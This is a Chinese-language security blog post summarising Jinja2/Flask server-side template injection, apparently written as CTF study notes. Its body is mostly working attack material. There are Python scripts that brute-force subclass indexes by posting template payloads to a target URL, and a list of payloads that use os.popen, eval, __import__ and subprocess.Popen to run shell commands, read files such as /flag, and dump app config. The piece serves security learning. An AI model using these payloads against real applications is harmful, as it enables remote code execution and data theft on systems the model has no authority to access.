



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="welcome to my blog" href="https://hq185187.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="welcome to my blog" href="https://hq185187.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="welcome to my blog" href="https://hq185187.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="java,git,springcloud" />


<link rel="canonical" href="https://hq185187.github.io/2023/05/02/SSTI/">



  <title>
SSTI总结 |
不良人天藏星 = welcome to my blog = 不良人总舵</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">SSTI总结
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-05-02 10:48:11">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-05-02T10:48:11+08:00">2023-05-02</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>4.7k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>4 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">不良人天藏星</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="/assets/14.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://hq185187.github.io/2023/05/02/SSTI/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="hq185187">
    <meta itemprop="description" content="不良人总舵, 不定时更新web安全相关知识">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="welcome to my blog">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p><mark>重点</mark></p>
<h2 id="怎么查找并且使用shell类找名字和脚本代码"><a class="markdownIt-Anchor" href="#怎么查找并且使用shell类找名字和脚本代码">#</a> 怎么查找并且使用 shell 类：找名字和脚本代码</h2>
<h3 id="一最笨的方法"><a class="markdownIt-Anchor" href="#一最笨的方法">#</a> 一。最笨的方法</h3>
<p>把所有的子类复制进 notepad++, 替换，为 \n, 查找常见名字来找可以利用类和对应的序号</p>
<h4 id="文件读取"><a class="markdownIt-Anchor" href="#文件读取">#</a> 文件读取</h4>
<p><code>&lt;class '_frozen_importlib_external.FileLoader'&gt;</code> <br>
 脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests  </span><br><span class="line">url=<span class="built_in">input</span>(<span class="string">&#x27;请输入URL链接: &#x27;</span>)  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):  </span><br><span class="line">data=&#123;<span class="string">&quot;code&quot;</span>:<span class="string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;]&#125;&#125;&quot;</span>&#125;<span class="comment">#这里的code要根据实际情况填写哦  </span></span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response=requests.post(url,data=data)  </span><br><span class="line"><span class="comment">#print(response.text)  </span></span><br><span class="line"><span class="keyword">if</span> response.status_code==<span class="number">200</span>:  </span><br><span class="line"><span class="keyword">if</span> <span class="string">&#x27;_frozen_importlib_external.FileLoader&#x27;</span> <span class="keyword">in</span> response.text:  </span><br><span class="line"><span class="built_in">print</span>(i)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line"><span class="keyword">pass</span></span><br></pre></td></tr></table></figure>
<p>注意这个类有 get_data 方法可以直接用，eg</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[122].get_data(0,&quot;flag&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<h4 id="查看内置函数和对象"><a class="markdownIt-Anchor" href="#查看内置函数和对象">#</a> 查看内置函数和对象</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;self.__dict__._TemplateReference__context.keys()&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hello dict_keys([&#x27;range&#x27;, &#x27;dict&#x27;, &#x27;lipsum&#x27;, &#x27;cycler&#x27;, &#x27;joiner&#x27;, &#x27;namespace&#x27;, &#x27;url_for&#x27;, &#x27;get_flashed_messages&#x27;, &#x27;config&#x27;, &#x27;request&#x27;, &#x27;session&#x27;, &#x27;g&#x27;])</span><br></pre></td></tr></table></figure>
<h4 id="os类builtins类查找"><a class="markdownIt-Anchor" href="#os类builtins类查找">#</a> <mark>os 类，builtins 类查找</mark></h4>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests  </span><br><span class="line">url=<span class="built_in">input</span>(<span class="string">&quot;请输入链接: &quot;</span>)  </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):  </span><br><span class="line">data = &#123;<span class="string">&quot;code&quot;</span>: <span class="string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;].__init__.__globals__&#125;&#125;&quot;</span>&#125; <span class="comment"># 这里的code要根据实际情况填写哦  </span></span><br><span class="line"><span class="keyword">try</span>:  </span><br><span class="line">response = requests.post(url, data=data)  </span><br><span class="line"><span class="comment"># print(response.text)  </span></span><br><span class="line"><span class="keyword">if</span> response.status_code == <span class="number">200</span>:  </span><br><span class="line"><span class="keyword">if</span> <span class="string">&#x27;builtins&#x27;</span> <span class="keyword">in</span> response.text:<span class="comment">#builtins可根据情况设置为&quot;os.py/os&quot;等等  </span></span><br><span class="line"><span class="built_in">print</span>(i)  </span><br><span class="line"><span class="keyword">else</span>:  </span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;-&#x27;</span>)  </span><br><span class="line"><span class="keyword">except</span>:  </span><br><span class="line"><span class="keyword">pass</span></span><br></pre></td></tr></table></figure>
<h4 id="builtins模板利用"><a class="markdownIt-Anchor" href="#builtins模板利用">#</a> builtins 模板利用</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__base__.__subclasses__()[128].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[128].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<h4 id="os模块利用"><a class="markdownIt-Anchor" href="#os模块利用">#</a> os 模块利用</h4>
<h5 id="1lipsum内置os"><a class="markdownIt-Anchor" href="#1lipsum内置os">#</a> 1.lipsum 内置 os</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&quot;whoami&quot;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h5 id="2url_for调用os"><a class="markdownIt-Anchor" href="#2url_for调用os">#</a> 2.url_for 调用 os</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.os.popen(&#x27;whoami&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h5 id="3已加载的os模块的子类里直接调用os模块"><a class="markdownIt-Anchor" href="#3已加载的os模块的子类里直接调用os模块">#</a> 3. 已加载的 os 模块的子类里直接调用 os 模块</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__base__.__subclasses__()[457].__init__.__globals__[&#x27;os&#x27;].popen(&#x27;whoami&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h5 id="4第三方库使用load_module加载os"><a class="markdownIt-Anchor" href="#4第三方库使用load_module加载os">#</a> 4. 第三方库，使用 load_module 加载 os</h5>
<p>python 脚本找_frozen_importlib.BuiltinImporter</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;[].__class__.__base__.__subclasses__()[69][&quot;load_module&quot;](&quot;os&quot;)[&quot;popen&quot;](&quot;whoami&quot;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h4 id="linecache函数"><a class="markdownIt-Anchor" href="#linecache函数">#</a> linecache 函数</h4>
<p>这个本来是读取任意一个文件某一行的，而这个函数也引入 os 模板，利用方法同 4, 先找 linecache 模块位置，再用 [‘linecache’][‘os’]</p>
<h5 id="subprocesspopen类"><a class="markdownIt-Anchor" href="#subprocesspopen类">#</a> subprocess.Popen 类</h5>
<p>脚本找类位置，假设是 496<br>
 利用方法:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__base__.__subclasses__()[496](&#x27;whoami&#x27;,shell=True,stdout=-1).communicate()[0].strip()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h3 id="jinjia格式"><a class="markdownIt-Anchor" href="#jinjia格式">#</a> jinjia 格式</h3>
<p><code>控制结构&#123;% %&#125;</code> <br>
 <code>变量取值&#123;&#123; &#125;&#125;</code> <br>
 <code>注释</code></p>
<h3 id="了解python的几个函数解析"><a class="markdownIt-Anchor" href="#了解python的几个函数解析">#</a> 了解 python 的几个函数解析</h3>
<p><em>class</em> 返回调用的参数类型<br>
<em> bases</em> 返回基类列表<br>
<em> mro</em> 返回所有子类元组，最后一个一般是 object<br>
<em>subclasses</em> () 返回 object 的子类<br>
<em> globals</em> 函数会以字典类型返回当前位置的全部全局变量<br>
<em> init</em> 检查这个类是否被重载过，一般没有，没有就能利用，没带 wapper 字段就是没有<br>
<strong> dic</strong> 保存类实例或对象实例的属性变量键值对字典<br>
<strong> builtins</strong> 内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数<br>
 url_for flask 的一个方法，可以用于得到__builtins__，而且 url_for.<strong>globals</strong>[‘<strong>builtins</strong>’] 含有 current_app。<br>
get_flashed_messages flask 的一个方法，可以用于得到__builtins__<br>
os.popen () 方法用于从一个命令打开一个管道。</p>
<h2 id="常见payload"><a class="markdownIt-Anchor" href="#常见payload">#</a> 常见 payload</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&#x27;&#x27;.__class__.__base__.__subclasses__()[185].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/&#123;&#123; config.__class__.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read() &#125;&#125;`</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[&#x27;current_app&#x27;].config.FLAG&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;get_flashed_messages.__globals__[&#x27;current_app&#x27;].config.FLAG&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><code>&#123;&#123;''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')&#125;&#125;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;].eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;&lt;command&gt;&#x27;).read()&quot;) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;lipsum.__globals__.__getitem__(&quot;os&quot;).popen(&quot;cat flag&quot;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">`&#123;&#123;a.__init__.__globals__.__builtins__.eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&quot;)&#125;&#125;`</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for i in &#x27;&#x27;.__class__.__base__.__subclasses__() %&#125;&#123;% if i.__name__==&#x27;Popen&#x27; %&#125;&#123;&#123; i.__init__.__globals__.__getitem__(&#x27;os&#x27;).popen(&#x27;cat flag&#x27;).read()&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p>参考:<br>
<span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vdnVscy8zNDc4NjUuaHRtbA==">PYTHON SSTI 的一些 BYPASS - FreeBuf 网络安全行业门户</span><br>
<span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vYXJ0aWNsZXMvd2ViLzMyODIyMi5odG1s"> CTF 对 SSTI 的一些总结 - FreeBuf 网络安全行业门户</span></p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-05-07 19:15:48" itemprop="dateModified" datetime="2023-05-07T19:15:48+08:00">2023-05-07</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>hq185187 <i class="ic i-at"><em>@</em></i>welcome to my blog
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://hq185187.github.io/2023/05/02/SSTI/" title="SSTI总结">https://hq185187.github.io/2023/05/02/SSTI/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/04/30/SSRF/" itemprop="url" rel="prev" data-background-image="&#x2F;assets&#x2F;11.jpg" title="SSRF绕过">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>SSRF绕过</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/05/02/ssti-labs/" itemprop="url" rel="next" data-background-image="&#x2F;assets&#x2F;12.jpg" title="SSTI-Labs">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>SSTI-Labs</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E6%9F%A5%E6%89%BE%E5%B9%B6%E4%B8%94%E4%BD%BF%E7%94%A8shell%E7%B1%BB%E6%89%BE%E5%90%8D%E5%AD%97%E5%92%8C%E8%84%9A%E6%9C%AC%E4%BB%A3%E7%A0%81"><span class="toc-number">1.</span> <span class="toc-text"> 怎么查找并且使用 shell 类：找名字和脚本代码</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E6%9C%80%E7%AC%A8%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">1.1.</span> <span class="toc-text"> 一。最笨的方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-number">1.1.1.</span> <span class="toc-text"> 文件读取</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E5%86%85%E7%BD%AE%E5%87%BD%E6%95%B0%E5%92%8C%E5%AF%B9%E8%B1%A1"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 查看内置函数和对象</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#os%E7%B1%BBbuiltins%E7%B1%BB%E6%9F%A5%E6%89%BE"><span class="toc-number">1.1.3.</span> <span class="toc-text"> os 类，builtins 类查找</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#builtins%E6%A8%A1%E6%9D%BF%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.4.</span> <span class="toc-text"> builtins 模板利用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#os%E6%A8%A1%E5%9D%97%E5%88%A9%E7%94%A8"><span class="toc-number">1.1.5.</span> <span class="toc-text"> os 模块利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1lipsum%E5%86%85%E7%BD%AEos"><span class="toc-number">1.1.5.1.</span> <span class="toc-text"> 1.lipsum 内置 os</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2url_for%E8%B0%83%E7%94%A8os"><span class="toc-number">1.1.5.2.</span> <span class="toc-text"> 2.url_for 调用 os</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3%E5%B7%B2%E5%8A%A0%E8%BD%BD%E7%9A%84os%E6%A8%A1%E5%9D%97%E7%9A%84%E5%AD%90%E7%B1%BB%E9%87%8C%E7%9B%B4%E6%8E%A5%E8%B0%83%E7%94%A8os%E6%A8%A1%E5%9D%97"><span class="toc-number">1.1.5.3.</span> <span class="toc-text"> 3. 已加载的 os 模块的子类里直接调用 os 模块</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4%E7%AC%AC%E4%B8%89%E6%96%B9%E5%BA%93%E4%BD%BF%E7%94%A8load_module%E5%8A%A0%E8%BD%BDos"><span class="toc-number">1.1.5.4.</span> <span class="toc-text"> 4. 第三方库，使用 load_module 加载 os</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#linecache%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.6.</span> <span class="toc-text"> linecache 函数</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#subprocesspopen%E7%B1%BB"><span class="toc-number">1.1.6.1.</span> <span class="toc-text"> subprocess.Popen 类</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#jinjia%E6%A0%BC%E5%BC%8F"><span class="toc-number">1.2.</span> <span class="toc-text"> jinjia 格式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%86%E8%A7%A3python%E7%9A%84%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0%E8%A7%A3%E6%9E%90"><span class="toc-number">1.3.</span> <span class="toc-text"> 了解 python 的几个函数解析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81payload"><span class="toc-number">2.</span> <span class="toc-text"> 常见 payload</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="hq185187"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">hq185187</p>
  <div class="description" itemprop="description">不定时更新web安全相关知识</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">21</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2hxMTg1MTg3" title="https:&#x2F;&#x2F;github.com&#x2F;hq185187"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/04/30/SSRF/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/05/02/ssti-labs/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/10/%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" title="原型链污染">原型链污染</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" title="SQL注入绕过">SQL注入绕过</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" title="正则表达式">正则表达式</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/NSSCTF/" title="分类于 NSSCTF精选">NSSCTF精选</a>
</div>

    <span><a href="/2023/05/12/nssctf2/" title="NSSCTF2">NSSCTF2</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/unserialize-labs/" title="Unserialize-labs">Unserialize-labs</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/NSSCTF/" title="分类于 NSSCTF精选">NSSCTF精选</a>
</div>

    <span><a href="/2023/04/26/nessctf/" title="NSSCTF1">NSSCTF1</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/30/md5/" title="MD5绕过总结">MD5绕过总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含及伪协议的使用">文件包含及伪协议的使用</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/14/LitCTF2023/" title="LitCTF2023">LitCTF2023</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="命令执行漏洞及绕过方法">命令执行漏洞及绕过方法</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hq185187 @ 不良人天藏星</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">101k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">1:31</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/05/02/SSTI/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
